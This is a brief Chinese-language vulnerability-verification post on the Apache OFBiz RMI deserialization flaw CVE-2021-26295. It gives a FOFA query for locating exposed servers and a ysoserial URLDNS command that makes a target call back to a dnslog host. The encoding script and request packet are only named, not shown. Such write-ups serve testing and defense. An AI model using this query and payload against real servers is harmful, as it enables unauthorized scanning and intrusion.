CVE-2021-26295 Apache OFBiz RMI 反序列化漏洞验证

一、漏洞简介

2021年3月22日 Apache OFBiz官方发布安全更新，修复了一处由RMI反序列化造成的远程代码执行漏洞。攻击者可构造恶意请求，触发反序列化，从而造成任意代码执行，控制服务器。

二、影响版本

Apache OFBiz < 17.12.06

三、漏洞验证

fofa搜索关键词：app="Apache_OFBiz"

[出自:jiwo.org]

利用ysoserial生成URLDNS利用链：

1.java -jar ysoserial.jar URLDNS http://***.dnslog.cn > dns.ot

公众号（黑客前沿）回复 ysoserial 获取下载链接

利用python脚本将ot文件解码：

构造请求数据包：

提交后，DNSlog收到请求：